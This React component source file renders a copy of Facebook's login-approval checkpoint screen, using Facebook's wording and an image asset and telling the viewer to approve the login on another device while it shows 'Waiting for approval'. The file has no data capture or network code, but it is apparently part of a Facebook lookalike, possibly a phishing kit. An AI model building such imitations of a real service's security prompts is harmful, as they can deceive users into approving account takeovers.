import React from "react";
import "./checkpoint.css";
import img from "../../assets/images/ACP-UnifiedDelta-Device-Mobile_light.png";

export function Checkpoint(props) {
  return (
    <div className="w-full flex justify-center h-full">
      <div id="checkpoint" className="flex flex-col w-600">
        <div className="title w-full text-left">{props?.name}</div>
        <h2 className="des w-full text-left">
          Check your notifications on another device
        </h2>
        <div className="content w-full text-left">
          Go to your Facebook account on another device and open the
          notification we sent to approve this login.
        </div>
        <div>
          <img width="100%" alt="" src={img} />
        </div>
        <div className="text-left flex mt-4 mx-3">
          <i className="fa-regular fa-circle-ellipsis text-xl"></i>
          <div className="flex flex-col ml-2">
            <div className="approve">Waiting for approval</div>
            <div className="text-left time">
              It may take a few minutes to get the notification on your other
              device. Get a new notification.
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
